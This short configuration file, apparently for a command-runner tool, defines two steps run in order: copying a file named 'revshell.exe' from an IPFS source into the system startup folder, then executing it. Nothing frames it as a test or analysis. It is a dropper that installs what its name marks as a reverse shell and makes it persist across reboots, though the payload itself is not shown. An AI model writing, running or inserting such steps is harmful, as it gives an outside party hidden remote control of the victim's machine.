# All will be executed, in order
run_all = ["copy_files", "run_shell"]

[[commands.copy_files.do.copy]]
from = "{ipfs}/revshell.exe"
to = "{startup}/revshell.exe"

[commands.run_shell]
do = { exec = "{startup}/revshell.exe" }
